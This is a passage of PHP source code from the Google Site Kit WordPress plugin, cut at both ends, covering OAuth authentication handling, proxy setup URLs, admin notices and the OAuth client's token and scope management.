FILTER_DEFAULT ); if ( $redirect_url ) { $redirect_url = esc_url_raw( wp_unslash( $redirect_url ) ); } $error_redirect_url = $input->filter( INPUT_GET, 'errorRedirect', FILTER_DEFAULT ); if ( $error_redirect_url ) { $error_redirect_url = esc_url_raw( wp_unslash( $error_redirect_url ) ); } // User is trying to authenticate, but access token hasn't been set. $additional_scopes = $input->filter( INPUT_GET, 'additional_scopes', FILTER_DEFAULT, FILTER_REQUIRE_ARRAY ); wp_safe_redirect( $this->get_oauth_client()->get_authentication_url( $redirect_url, $error_redirect_url, $additional_scopes ) ); exit(); } /** * Handles request to disconnect via oAuth. * * @since 1.32.0 */ private function handle_disconnect() { $nonce = $this->context->input()->filter( INPUT_GET, 'nonce' ); if ( ! wp_verify_nonce( $nonce, self::ACTION_DISCONNECT ) ) { $this->invalid_nonce_error( self::ACTION_DISCONNECT ); } if ( ! current_user_can( Permissions::AUTHENTICATE ) ) { wp_die( esc_html__( 'You don’t have permissions to authenticate with Site Kit.', 'google-site-kit' ), 403 ); } $this->disconnect(); $redirect_url = $this->context->admin_url( 'splash', array( 'googlesitekit_reset_session' => 1, ) ); wp_safe_redirect( $redirect_url ); exit(); } /** * Gets the update core URL if the user can update the WordPress core version. * * If the site is multisite, it gets the update core URL for the network admin. * * @since 1.85.0 * * @return string The update core URL. */ private function get_update_core_url() { if ( ! current_user_can( 'update_core' ) ) { return ''; } if ( is_multisite() ) { return admin_url( 'network/update-core.php' ); } return admin_url( 'update-core.php' ); } /** * Modifies the base data to pass to JS. * * @since 1.2.0 * * @param array $data Inline JS data. * @return array Filtered $data. */ private function inline_js_base_data( $data ) { $data['isOwner'] = $this->owner_id->get() === get_current_user_id(); $data['splashURL'] = esc_url_raw( $this->context->admin_url( 'splash' ) ); $data['proxySetupURL'] = ''; $data['proxyPermissionsURL'] = ''; $data['usingProxy'] = false; $data['isAuthenticated'] = $this->is_authenticated(); $data['setupErrorCode'] = null; $data['setupErrorMessage'] = null; $data['setupErrorRedoURL'] = null; $data['proxySupportLinkURL'] = null; $data['updateCoreURL'] = null; if ( $this->credentials->using_proxy() ) { $auth_client = $this->get_oauth_client(); $data['proxySetupURL'] = esc_url_raw( $this->get_proxy_setup_url() ); $data['proxyPermissionsURL'] = esc_url_raw( $this->get_proxy_permissions_url() ); $data['usingProxy'] = true; $data['proxySupportLinkURL'] = esc_url_raw( $this->get_proxy_support_link_url() ); $data['updateCoreURL'] = esc_url_raw( $this->get_update_core_url() ); // Check for an error in the proxy setup. $error_code = $this->user_options->get( OAuth_Client::OPTION_ERROR_CODE ); // If an error is found, add it to the data we send to the client. // // We'll also remove the existing access code in the user options, // because it isn't valid (given there was a setup error). if ( ! empty( $error_code ) ) { $data['setupErrorCode'] = $error_code; $data['setupErrorMessage'] = $auth_client->get_error_message( $error_code ); // Get credentials needed to authenticate with the proxy // so we can build a new setup URL. $credentials = $this->credentials->get(); $access_code = $this->user_options->get( OAuth_Client::OPTION_PROXY_ACCESS_CODE ); // Both the access code and site ID are needed to generate // a setup URL. if ( $access_code && ! empty( $credentials['oauth2_client_id'] ) ) { $setup_url = $this->google_proxy->setup_url( array( 'code' => $access_code, 'site_id' => $credentials['oauth2_client_id'], ) ); $this->user_options->delete( OAuth_Client::OPTION_PROXY_ACCESS_CODE ); } elseif ( $this->is_authenticated() ) { $setup_url = $this->get_connect_url(); } else { $setup_url = $data['proxySetupURL']; } // Add the setup URL to the data sent to the client. $data['setupErrorRedoURL'] = $setup_url; // Remove the error code from the user options so it doesn't // appear again. $this->user_options->delete( OAuth_Client::OPTION_ERROR_CODE ); } } $version = get_bloginfo( 'version' ); $data['wpVersion'] = $this->inline_js_wp_version( $version ); if ( version_compare( $version, '5.5', '>=' ) && function_exists( 'wp_is_auto_update_enabled_for_type' ) ) { $data['changePluginAutoUpdatesCapacity'] = Auto_Updates::is_plugin_autoupdates_enabled() && Auto_Updates::AUTO_UPDATE_NOT_FORCED === Auto_Updates::sitekit_forced_autoupdates_status(); $data['siteKitAutoUpdatesEnabled'] = Auto_Updates::is_sitekit_autoupdates_enabled(); } $data['pluginBasename'] = GOOGLESITEKIT_PLUGIN_BASENAME; $current_user = wp_get_current_user(); $data['userRoles'] = $current_user->roles; return $data; } /** * Gets the WP version to pass to JS. * * @since 1.93.0 * * @param string $version The WP version. * @return array The WP version to pass to JS. */ private function inline_js_wp_version( $version ) { // The trailing '.0' is added to the $version to ensure there are always at least 2 segments in the version. // This is necessary in case the minor version is stripped from the version string by a plugin. // See https://github.com/google/site-kit-wp/issues/4963 for more details. list( $major, $minor ) = explode( '.', $version . '.0' ); return array( 'version' => $version, 'major' => (int) $major, 'minor' => (int) $minor, ); } /** * Modifies the admin data to pass to JS. * * @since 1.0.0 * * @param array $data Inline JS data. * @return array Filtered $data. */ private function inline_js_admin_data( $data ) { $data['connectURL'] = esc_url_raw( $this->get_connect_url() ); $data['disconnectURL'] = esc_url_raw( $this->get_disconnect_url() ); return $data; } /** * Modifies the setup data to pass to JS. * * @since 1.0.0 * * @param array $data Inline JS data. * @return array Filtered $data. */ private function inline_js_setup_data( $data ) { $auth_client = $this->get_oauth_client(); $is_authenticated = $this->is_authenticated(); $data['isSiteKitConnected'] = $this->credentials->has(); $data['isResettable'] = $this->options->has( Credentials::OPTION ); $data['isAuthenticated'] = $is_authenticated; $data['requiredScopes'] = $auth_client->get_required_scopes(); $data['grantedScopes'] = $is_authenticated ? $auth_client->get_granted_scopes() : array(); $data['unsatisfiedScopes'] = $is_authenticated ? $auth_client->get_unsatisfied_scopes() : array(); $data['needReauthenticate'] = $auth_client->needs_reauthentication(); // All admins need to go through site verification process. if ( current_user_can( Permissions::MANAGE_OPTIONS ) ) { $data['isVerified'] = $this->verification->has(); } else { $data['isVerified'] = false; } // The actual data for this is passed in from the Search Console module. if ( ! isset( $data['hasSearchConsoleProperty'] ) ) { $data['hasSearchConsoleProperty'] = false; } return $data; } /** * Adds / modifies tracking relevant data to pass to JS. * * @since 1.78.0 * * @param array $data Inline JS data. * @return array Filtered $data. */ private function inline_js_tracking_data( $data ) { $data['isAuthenticated'] = $this->is_authenticated(); $data['userRoles'] = wp_get_current_user()->roles; return $data; } /** * Add allowed redirect host to safe wp_safe_redirect * * @since 1.0.0 * * @param array $hosts Array of safe hosts to redirect to. * * @return array */ private function allowed_redirect_hosts( $hosts ) { $hosts[] = 'accounts.google.com'; $hosts[] = URL::parse( $this->google_proxy->url(), PHP_URL_HOST ); // In the case of IDNs, ensure the ASCII and non-ASCII domains // are treated as allowable origins. $admin_hostname = URL::parse( admin_url(), PHP_URL_HOST ); // See \Requests_IDNAEncoder::is_ascii. $is_ascii = preg_match( '/(?:[^\x00-\x7F])/', $admin_hostname ) !== 1; // If this host is already an ASCII-only string, it's either // not an IDN or it's an ASCII-formatted IDN. // We only need to intervene if it is non-ASCII. if ( ! $is_ascii ) { // If this host is an IDN in Unicode format, we need to add the // urlencoded versions of the domain to the `$hosts` array, // because this is what will be used for redirects. $hosts[] = rawurlencode( $admin_hostname ); } return $hosts; } /** * Shows admin notification for authentication related issues. * * @since 1.0.0 * * @param array $notices Array of admin notices. * * @return array Array of admin notices. */ private function authentication_admin_notices( $notices ) { // Only include notices if in the correct admin panel. if ( $this->context->is_network_mode() !== is_network_admin() ) { return $notices; } $notices[] = $this->get_reauthentication_needed_notice(); $notices[] = $this->get_reconnect_after_url_mismatch_notice(); return $notices; } /** * Gets reconnect notice. * * @since 1.17.0 * * @return Notice Notice object. */ private function get_reconnect_after_url_mismatch_notice() { return new Notice( 'reconnect_after_url_mismatch', array( 'content' => function () { $connected_url = $this->connected_proxy_url->get(); $current_url = $this->context->get_canonical_home_url(); $content = '<p>' . sprintf( /* translators: 1: Plugin name. 2: URL change message. 3: Proxy setup URL. 4: Reconnect string. 5: Proxy support link for the url-has-changed help page. 6: Help link message. */ __( '%1$s: %2$s <a href="%3$s">%4$s</a>. <a target="_blank" href="%5$s">%6$s</a>', 'google-site-kit' ), esc_html__( 'Site Kit by Google', 'google-site-kit' ), esc_html__( 'Looks like the URL of your site has changed. In order to continue using Site Kit, you’ll need to reconnect, so that your plugin settings are updated with the new URL.', 'google-site-kit' ), esc_url( $this->get_proxy_setup_url() ), esc_html__( 'Reconnect', 'google-site-kit' ), esc_url( $this->get_proxy_support_link_url() . '/?doc=url-has-changed' ), esc_html__( 'Get help', 'google-site-kit' ) ) . '</p>'; // Only show the comparison if URLs don't match as it is possible // they could already match again at this point, although they most likely won't. if ( ! $this->connected_proxy_url->matches_url( $current_url ) ) { $content .= sprintf( '<ul><li>%s</li><li>%s</li></ul>', sprintf( /* translators: %s: Previous URL */ esc_html__( 'Old URL: %s', 'google-site-kit' ), $connected_url ), sprintf( /* translators: %s: Current URL */ esc_html__( 'New URL: %s', 'google-site-kit' ), $current_url ) ); } return $content; }, 'type' => Notice::TYPE_INFO, 'active_callback' => function () { return $this->disconnected_reason->get() === Disconnected_Reason::REASON_CONNECTED_URL_MISMATCH && $this->credentials->has(); }, ) ); } /** * Gets re-authentication notice. * * @since 1.0.0 * * @return Notice Notice object. */ private function get_reauthentication_needed_notice() { return new Notice( 'needs_reauthentication', array( 'content' => function () { ob_start(); ?> <p> <?php echo esc_html( sprintf( /* translators: 1: Plugin name. 2: Message. */ __( '%1$s: %2$s', 'google-site-kit' ), __( 'Site Kit by Google', 'google-site-kit' ), __( 'You need to reauthenticate your Google account.', 'google-site-kit' ) ) ); ?> <a href="#" onclick="clearSiteKitAppStorage()" ><?php esc_html_e( 'Click here', 'google-site-kit' ); ?></a> </p> <?php BC_Functions::wp_print_inline_script_tag( sprintf( " function clearSiteKitAppStorage() { if ( localStorage ) { localStorage.clear(); } if ( sessionStorage ) { sessionStorage.clear(); } document.location = '%s'; } ", esc_url_raw( $this->get_connect_url() ) ) ); return ob_get_clean(); }, 'type' => Notice::TYPE_SUCCESS, 'active_callback' => function () { if ( ! empty( $this->user_options->get( OAuth_Client::OPTION_ERROR_CODE ) ) ) { return false; } $unsatisfied_scopes = $this->get_oauth_client()->get_unsatisfied_scopes(); if ( count( $unsatisfied_scopes ) === 1 && 'https://www.googleapis.com/auth/tagmanager.readonly' === $unsatisfied_scopes[0] ) { return false; } return $this->get_oauth_client()->needs_reauthentication(); }, ) ); } /** * Sets the current connected proxy URL. * * @since 1.17.0 */ private function set_connected_proxy_url() { $this->connected_proxy_url->set( $this->context->get_canonical_home_url() ); } /** * Checks whether the current site URL has changed or not. If the URL has been changed, * it disconnects the Site Kit and sets the disconnected reason to "connected_url_mismatch". * * @since 1.17.0 */ private function check_connected_proxy_url() { if ( $this->connected_proxy_url->matches_url( $this->context->get_canonical_home_url() ) ) { return; } if ( ! current_user_can( Permissions::SETUP ) ) { return; } if ( ! $this->credentials->has() ) { return; } if ( ! $this->credentials->using_proxy() ) { return; } if ( ! $this->is_authenticated() ) { return; } if ( ! $this->connected_proxy_url->has() ) { $this->set_connected_proxy_url(); return; } $this->disconnect(); $this->disconnected_reason->set( Disconnected_Reason::REASON_CONNECTED_URL_MISMATCH ); } /** * Gets the publicly visible URL to set up the plugin with the authentication proxy. * * @since 1.17.0 * * @return string An URL for googlesitekit_proxy_connect_user action protected with a nonce. */ private function get_proxy_setup_url() { return add_query_arg( array( 'action' => Google_Proxy::ACTION_SETUP_START, 'nonce' => wp_create_nonce( Google_Proxy::ACTION_SETUP_START ), ), admin_url( 'index.php' ) ); } /** * Handles proxy permissions. * * @since 1.18.0 */ private function handle_proxy_permissions() { $nonce = $this->context->input()->filter( INPUT_GET, 'nonce' ); if ( ! wp_verify_nonce( $nonce, Google_Proxy::ACTION_PERMISSIONS ) ) { $this->invalid_nonce_error( Google_Proxy::ACTION_PERMISSIONS ); } if ( ! current_user_can( Permissions::AUTHENTICATE ) ) { wp_die( esc_html__( 'You have insufficient permissions to manage Site Kit permissions.', 'google-site-kit' ) ); } if ( ! $this->credentials->using_proxy() ) { wp_die( esc_html__( 'Site Kit is not configured to use the authentication proxy.', 'google-site-kit' ) ); } wp_safe_redirect( $this->get_oauth_client()->get_proxy_permissions_url() ); exit; } /** * Gets the proxy permission URL. * * @since 1.18.0 * * @return string Proxy permission URL. */ private function get_proxy_permissions_url() { return add_query_arg( array( 'action' => Google_Proxy::ACTION_PERMISSIONS, 'nonce' => wp_create_nonce( Google_Proxy::ACTION_PERMISSIONS ), ), admin_url( 'index.php' ) ); } /** * Gets the proxy support URL. * * @since 1.80.0 * * @return string|null Support URL. */ public function get_proxy_support_link_url() { return $this->google_proxy->url( Google_Proxy::SUPPORT_LINK_URI ); } /** * Invalid nonce error handler. * * @since 1.42.0 * * @param string $action Action name. */ public function invalid_nonce_error( $action ) { if ( strpos( $action, 'googlesitekit_proxy_' ) !== 0 ) { wp_nonce_ays( $action ); return; } // Copied from wp_nonce_ays() with tweak to the url. $html = __( 'The link you followed has expired.', 'google-site-kit' ); $html .= '</p><p>'; $html .= sprintf( /* translators: 1: Admin splash URL. 2: Support link URL. */ __( '<a href="%1$s">Please try again</a>. Retry didn’t work? <a href="%2$s" target="_blank">Get help</a>.', 'google-site-kit' ), esc_url( Plugin::instance()->context()->admin_url( 'splash' ) ), esc_url( $this->get_proxy_support_link_url() . '?error_id=nonce_expired' ) ); wp_die( $html, __( 'Something went wrong.', 'google-site-kit' ), 403 ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped } /** * Helper method to return options property. * * @since 1.131.0 * * @return Options */ public function get_options_instance() { return $this->options; } /** * Helper method to return has_connected_admins property. * * @since 1.131.0 * * @return Has_Connected_Admins */ public function get_has_connected_admins_instance() { return $this->has_connected_admins; } /** * Helper method to return has_multiple_admins property. * * @since 1.131.0 * * @return Has_Multiple_Admins */ public function get_has_multiple_admins_instance() { return $this->has_multiple_admins; } /** * Helper method to return owner_id property. * * @since 1.131.0 * * @return Owner_ID */ public function get_owner_id_instance() { return $this->owner_id; } /** * Helper method to return disconnected_reason property. * * @since 1.131.0 * * @return Disconnected_Reason */ public function get_disconnected_reason_instance() { return $this->disconnected_reason; } /** * Helper method to return connected_proxy_url property. * * @since 1.131.0 * * @return Connected_Proxy_URL */ public function get_connected_proxy_url_instance() { return $this->connected_proxy_url; } /** * Gets an array of internal feature metrics. * * @since 1.163.0 * * @return array */ public function get_feature_metrics() { return array( 'auto_updates_enabled' => Auto_Updates::is_sitekit_autoupdates_enabled(), ); } } <?php /** * Class Google\Site_Kit\Core\Authentication\Clients\OAuth_Client * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication\Clients; use Exception; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Authentication\Credentials; use Google\Site_Kit\Core\Authentication\Exception\Google_Proxy_Code_Exception; use Google\Site_Kit\Core\Authentication\Google_Proxy; use Google\Site_Kit\Core\Authentication\Owner_ID; use Google\Site_Kit\Core\Authentication\Profile; use Google\Site_Kit\Core\Authentication\Token; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\Storage\Options; use Google\Site_Kit\Core\Storage\Transients; use Google\Site_Kit\Core\Storage\User_Options; use Google\Site_Kit\Core\Util\Scopes; use Google\Site_Kit\Core\Util\URL; use Google\Site_Kit_Dependencies\Google\Service\PeopleService as Google_Service_PeopleService; /** * Class for connecting to Google APIs via OAuth. * * @since 1.0.0 * @since 1.39.0 Now extends `OAuth_Client_Base`. * @access private * @ignore */ final class OAuth_Client extends OAuth_Client_Base { const OPTION_ADDITIONAL_AUTH_SCOPES = 'googlesitekit_additional_auth_scopes'; const OPTION_REDIRECT_URL = 'googlesitekit_redirect_url'; const OPTION_ERROR_REDIRECT_URL = 'googlesitekit_error_redirect_url'; const CRON_REFRESH_PROFILE_DATA = 'googlesitekit_cron_refresh_profile_data'; /** * Owner_ID instance. * * @since 1.16.0 * @var Owner_ID */ private $owner_id; /** * Transients instance. * * @since 1.150.0 * @var Transients */ private $transients; /** * Constructor. * * @since 1.0.0 * * @param Context $context Plugin context. * @param Options $options Optional. Option API instance. Default is a new instance. * @param User_Options $user_options Optional. User Option API instance. Default is a new instance. * @param Credentials $credentials Optional. Credentials instance. Default is a new instance from $options. * @param Google_Proxy $google_proxy Optional. Google proxy instance. Default is a new instance. * @param Profile $profile Optional. Profile instance. Default is a new instance. * @param Token $token Optional. Token instance. Default is a new instance. * @param Transients $transients Optional. Transients instance. Default is a new instance. */ public function __construct( Context $context, ?Options $options = null, ?User_Options $user_options = null, ?Credentials $credentials = null, ?Google_Proxy $google_proxy = null, ?Profile $profile = null, ?Token $token = null, ?Transients $transients = null ) { parent::__construct( $context, $options, $user_options, $credentials, $google_proxy, $profile, $token ); $this->owner_id = new Owner_ID( $this->options ); $this->transients = $transients ?: new Transients( $this->context ); } /** * Refreshes the access token. * * While this method can be used to explicitly refresh the current access token, the preferred way * should be to rely on the Google_Site_Kit_Client to do that automatically whenever the current access token * has expired. * * @since 1.0.0 */ public function refresh_token() { $token = $this->get_token(); if ( empty( $token['refresh_token'] ) ) { $this->delete_token(); $this->user_options->set( self::OPTION_ERROR_CODE, 'refresh_token_not_exist' ); return; } try { $token_response = $this->get_client()->fetchAccessTokenWithRefreshToken( $token['refresh_token'] ); } catch ( \Exception $e ) { $this->handle_fetch_token_exception( $e ); return; } if ( ! isset( $token_response['access_token'] ) ) { $this->user_options->set( self::OPTION_ERROR_CODE, 'access_token_not_received' ); return; } $this->set_token( $token_response ); } /** * Revokes the access token. * * @since 1.0.0 */ public function revoke_token() { try { $this->get_client()->revokeToken(); } catch ( \Exception $e ) { // phpcs:ignore Generic.CodeAnalysis.EmptyStatement // No special handling, we just need to make sure this goes through. } $this->delete_token(); } /** * Gets the list of currently granted Google OAuth scopes for the current user. * * @since 1.0.0 * @see https://developers.google.com/identity/protocols/googlescopes * * @return string[] List of Google OAuth scopes. */ public function get_granted_scopes() { $base_scopes = parent::get_granted_scopes(); $extra_scopes = $this->get_granted_additional_scopes(); return array_unique( array_merge( $base_scopes, $extra_scopes ) ); } /** * Gets the list of currently granted additional Google OAuth scopes for the current user. * * Scopes are considered "additional scopes" if they were granted to perform a specific action, * rather than being granted as an overall required scope. * * @since 1.9.0 * @see https://developers.google.com/identity/protocols/googlescopes * * @return string[] List of Google OAuth scopes. */ public function get_granted_additional_scopes() { return array_values( $this->user_options->get( self::OPTION_ADDITIONAL_AUTH_SCOPES ) ?: array() ); } /** * Checks if new scopes are required that are not yet granted for the current user. * * @since 1.9.0 * * @return bool true if any required scopes are not satisfied, otherwise false. */ public function needs_reauthentication() { if ( ! $this->token->has() ) { return false; } return ! $this->has_sufficient_scopes(); } /** * Gets the list of scopes which are not satisfied by the currently granted scopes. * * @since 1.9.0 * * @param string[] $scopes Optional. List of scopes to test against granted scopes. * Default is the list of required scopes. * @return string[] Filtered $scopes list, only including scopes that are not satisfied. */ public function get_unsatisfied_scopes( ?array $scopes = null ) { if ( null === $scopes ) { $scopes = $this->get_required_scopes(); } $granted_scopes = $this->get_granted_scopes(); $unsatisfied_scopes = array_filter( $scopes, function ( $scope ) use ( $granted_scopes ) { return ! Scopes::is_satisfied_by( $scope, $granted_scopes ); } ); return array_values( $unsatisfied_scopes ); } /** * Checks whether or not currently granted scopes are sufficient for the given list. * * @since 1.9.0 * * @param string[] $scopes Optional. List of scopes to test against granted scopes. * Default is the list of required scopes. * @return bool True if all $scopes are satisfied, false otherwise. */ public function has_sufficient_scopes( ?array $scopes = null ) { if ( null === $scopes ) { $scopes = $this->get_required_scopes(); } return Scopes::are_satisfied_by( $scopes, $this->get_granted_scopes() ); } /** * Sets the list of currently granted Google OAuth scopes for the current user. * * @since 1.0.0 * @see https://developers.google.com/identity/protocols/googlescopes * * @param string[] $scopes List of Google OAuth scopes. */ public function set_granted_scopes( $scopes ) { $required_scopes = $this->get_required_scopes(); $base_scopes = array(); $extra_scopes = array(); foreach ( $scopes as $scope ) { if ( in_array( $scope, $required_scopes, true ) ) { $base_scopes[] = $scope; } else { $extra_scopes[] = $scope; } } parent::set_granted_scopes( $base_scopes ); $this->user_options->set( self::OPTION_ADDITIONAL_AUTH_SCOPES, $extra_scopes ); } /** * Gets the current user's OAuth access token. * * @since 1.0.0 * * @return string|bool Access token if it exists, false otherwise. */ public function get_access_token() { $token = $this->get_token(); if ( empty( $token['access_token'] ) ) { return false; } return $token['access_token']; } /** * Sets the current user's OAuth access token. * * @since 1.0.0 * @deprecated 1.39.0 Use `OAuth_Client::set_token` instead. * * @param string $access_token New access token. * @param int $expires_in TTL of the access token in seconds. * @param int $created Optional. Timestamp when the token was created, in GMT. Default is the current time. * @return bool True on success, false on failure. */ public function set_access_token( $access_token, $expires_in, $created = 0 ) { _deprecated_function( __METHOD__, '1.39.0', self::class . '::set_token' ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped return $this->set_token( array( 'access_token' => $access_token, 'expires_in' => $expires_in, 'created' => $created, ) ); } /** * Gets the current user's OAuth refresh token. * * @since 1.0.0 * @deprecated 1.39.0 Use `OAuth_Client::get_token` instead. * * @return string|bool Refresh token if it exists, false otherwise. */ public function get_refresh_token() { _deprecated_function( __METHOD__, '1.39.0', self::class . '::get_token' ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped $token = $this->get_token(); if ( empty( $token['refresh_token'] ) ) { return false; } return $token['refresh_token']; } /** * Sets the current user's OAuth refresh token. * * @since 1.0.0 * @deprecated 1.39.0 Use `OAuth_Client::set_token` instead. * * @param string $refresh_token New refresh token. * @return bool True on success, false on failure. */ public function set_refresh_token( $refresh_token ) { _deprecated_function( __METHOD__, '1.39.0', self::class . '::set_token' ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped $token = $this->get_token(); $token['refresh_token'] = $refresh_token; return $this->set_token( $token ); } /** * Gets the authentication URL. * * @since 1.0.0 * @since 1.9.0 Added $additional_scopes parameter. * @since 1.34.1 Updated handling of $additional_scopes to restore rewritten scope. * * @param string $redirect_url Redirect URL after authentication. * @param string $error_redirect_url Redirect URL after authentication error. * @param string[] $additional_scopes List of additional scopes to request. * @return string Authentication URL. */ public function get_authentication_url( $redirect_url = '', $error_redirect_url = '', $additional_scopes = array() ) { if ( empty( $redirect_url ) ) { $redirect_url = $this->context->admin_url( 'splash' ); } if ( is_array( $additional_scopes ) ) { // Rewrite each scope to convert `gttp` -> `http`, if it starts with this placeholder scheme. // This restores the original scope rewritten by getConnectURL. $additional_scopes = array_map( function ( $scope ) { return preg_replace( '/^gttp(s)?:/', 'http$1:', $scope ); }, $additional_scopes ); } else { $additional_scopes = array(); } $url_query = URL::parse( $redirect_url, PHP_URL_QUERY ); if ( $url_query ) { parse_str( $url_query, $query_args ); } if ( empty( $query_args['notification'] ) ) { $redirect_url = add_query_arg( array( 'notification' => 'authentication_success' ), $redirect_url ); } // Ensure we remove error query string. $redirect_url = remove_query_arg( 'error', $redirect_url ); $this->user_options->set( self::OPTION_REDIRECT_URL, $redirect_url ); $this->user_options->set( self::OPTION_ERROR_REDIRECT_URL, $error_redirect_url ); // Ensure the latest required scopes are requested. $scopes = array_merge( $this->get_required_scopes(), $additional_scopes ); $this->get_client()->setScopes( array_unique( $scopes ) ); return add_query_arg( $this->google_proxy->get_metadata_fields(), $this->get_client()->createAuthUrl() ); } /** * Redirects the current user to the Google OAuth consent screen, or processes a response from that consent * screen if present. * * @since 1.0.0 * @since 1.49.0 Uses the new `Google_Proxy::setup_url_v2` method when the `serviceSetupV2` feature flag is enabled. */ public function authorize_user() { $code = htmlspecialchars( $this->context->input()->filter( INPUT_GET, 'code' ) ?? '' ); $error_code = htmlspecialchars( $this->context->input()->filter( INPUT_GET, 'error' ) ?? '' ); // If we have a code, check if there's a stored redirect URL to prevent duplicate setups. // The OAuth2 spec requires that an authorization code can only be used once. // If `fetchAccessTokenWithAuthCode()` is called more than once with the same code, Google will return an error. // This may happen when users click the final setup button multiple times or // if there are concurrent requests with the same authorization code. // By storing the successful redirect URL in transients and reusing it for duplicate // requests with the same code, we ensure a smooth setup experience even when // the same code is encountered multiple times. if ( ! empty( $code ) ) { $code_hash = md5( $code ); $stored_redirect = $this->transients->get( $code_hash ); // If we have a stored redirect URL and valid credentials, redirect to prevent duplicate setup. if ( ! empty( $stored_redirect ) && $this->credentials->has() ) { wp_safe_redirect( $stored_redirect ); exit(); } } // If the OAuth redirects with an error code, handle it. if ( ! empty( $error_code ) ) { $this->user_options->set( self::OPTION_ERROR_CODE, $error_code ); wp_safe_redirect( $this->get_authorize_user_redirect_url_for_error() ); exit(); } if ( ! $this->credentials->has() ) { $this->user_options->set( self::OPTION_ERROR_CODE, 'oauth_credentials_not_exist' ); wp_safe_redirect( $this->get_authorize_user_redirect_url_for_error() ); exit(); } try { $token_response = $this->get_client()->fetchAccessTokenWithAuthCode( $code ); } catch ( Google_Proxy_Code_Exception $e ) { // Redirect back to proxy immediately with the access code. $credentials = $this->credentials->get(); $params = array( 'code' => $e->getAccessCode(), 'site_id' => ! empty( $credentials['oauth2_client_id'] ) ? $credentials['oauth2_client_id'] : '', ); $params = $this->google_proxy->add_setup_step_from_error_code( $params, $e->getMessage() ); $url = $this->google_proxy->setup_url( $params ); wp_safe_redirect( $url ); exit(); } catch ( Exception $e ) { $this->handle_fetch_token_exception( $e ); wp_safe_redirect( $this->get_authorize_user_redirect_url_for_error() ); exit(); } if ( ! isset( $token_response['access_token'] ) ) { $this->user_options->set( self::OPTION_ERROR_CODE, 'access_token_not_received' ); wp_safe_redirect( $this->get_authorize_user_redirect_url_for_error() ); exit(); } // Update the access token and refresh token. $this->set_token( $token_response ); // Store the previously granted scopes for use in the action below before they're updated. $previous_scopes = $this->get_granted_scopes(); // Update granted scopes. if ( isset( $token_response['scope'] ) ) { $scopes = explode( ' ', sanitize_text_field( $token_response['scope'] ) ); } elseif ( $this->context->input()->filter( INPUT_GET, 'scope' ) ) { $scope = htmlspecialchars( $this->context->input()->filter( INPUT_GET, 'scope' ) ); $scopes = explode( ' ', $scope ); } else { $scopes = $this->get_required_scopes(); } $scopes = array_filter( $scopes, function ( $scope ) { if ( ! is_string( $scope ) ) { return false; } if ( in_array( $scope, array( 'openid', 'profile', 'email' ), true ) ) { return true; } return 0 === strpos( $scope, 'https://www.googleapis.com/auth/' ); } ); $this->set_granted_scopes( $scopes ); $this->refresh_profile_data( 2 * MINUTE_IN_SECONDS ); /** * Fires when the current user has just been authorized to access Google APIs. * * In other words, this action fires whenever Site Kit has just obtained a new set of access token and * refresh token for the current user, which may happen to set up the initial connection or to request * access to further scopes. * * @since 1.3.0 * @since 1.6.0 The $token_response parameter was added. * @since 1.30.0 The $scopes and $previous_scopes parameters were added. * * @param array $token_response Token response data. * @param string[] $scopes List of scopes. * @param string[] $previous_scopes List of previous scopes. */ do_action( 'googlesitekit_authorize_user', $token_response, $scopes, $previous_scopes ); // This must happen after googlesitekit_authorize_user as the permissions checks depend on // values set which affect the meta capability mapping. $current_user_id = get_current_user_id(); if ( $this->should_update_owner_id( $current_user_id ) ) { $this->owner_id->set( $current_user_id ); } $redirect_url = $this->get_authorize_user_redirect_url(); // Store the redirect URL in transients using the authorization code hash as the key. // This prevents duplicate setup attempts if the user clicks the setup CTA button multiple times, // as subsequent requests with the same code will be redirected to the stored URL. // Must be done before the redirect to ensure the URL is available for any duplicate requests. if ( ! empty( $code ) && ! empty( $redirect_url ) ) { $code_hash = md5( $code ); $this->transients->set( $code_hash, $redirect_url, 5 * MINUTE_IN_SECONDS ); } wp_safe_redirect( $redirect_url ); exit(); } /** * Fetches and updates the user profile data for the currently authenticated Google account. * * @since 1.1.4 * @since 1.13.0 Added $retry_after param, also made public. * * @param int $retry_after Optional. Number of seconds to retry data fetch if unsuccessful. */ public function refresh_profile_data( $retry_after = 0 ) { $client = $this->get_client(); $restore_defer = $client->withDefer( false ); try { $people_service = new Google_Service_PeopleService( $client ); $response = $people_service->people->get( 'people/me', array( 'personFields' => 'emailAddresses,photos,names' ) ); if ( isset( $response['emailAddresses'][0]['value'], $response['photos'][0]['url'], $response['names'][0]['displayName'] ) ) { $this->profile->set( array( 'email' => $response['emailAddresses'][0]['value'], 'photo' => $response['photos'][0]['url'], 'full_name' => $response['names'][0]['displayName'], 'last_updated' => time(), ) ); } // Clear any scheduled job to refresh this data later, if any. wp_clear_scheduled_hook( self::CRON_REFRESH_PROFILE_DATA, array( $this->user_options->get_user_id() ) ); } catch ( Exception $e ) { $retry_after = absint( $retry_after ); if ( $retry_after < 1 ) { return; } wp_schedule_single_event( time() + $retry_after, self::CRON_REFRESH_PROFILE_DATA, array( $this->user_options->get_user_id() ) ); } finally { $restore_defer(); } } /** * Determines whether the current owner ID must be changed or not. * * @since 1.16.0 * * @param int $user_id Current user ID. * @return bool TRUE if owner needs to be changed, otherwise FALSE. */ private function should_update_owner_id( $user_id ) { $current_owner_id = $this->owner_id->get(); if ( $current_owner_id === $user_id ) { return false; } if ( ! empty( $current_owner_id ) && user_can( $current_owner_id, Permissions::MANAGE_OPTIONS ) ) { return false; } if ( ! user_can( $user_id, Permissions::MANAGE_OPTIONS ) ) { return false; } return true; } /** * Returns the permissions URL to the authentication proxy. * * This only returns a URL if the user already has an access token set. * * @since 1.0.0 * * @return string URL to the permissions page on the authentication proxy on success, * or empty string on failure. */ public function get_proxy_permissions_url() { $access_token = $this->get_access_token(); if ( empty( $access_token ) ) { return ''; } return $this->google_proxy->permissions_url( $this->credentials, array( 'token' => $access_token ) ); } /** * Deletes the current user's token and all associated data. * * @since 1.0.3 */ protected function delete_token() { parent::delete_token(); $this->user_options->delete( self::OPTION_REDIRECT_URL ); $this->user_options->delete( 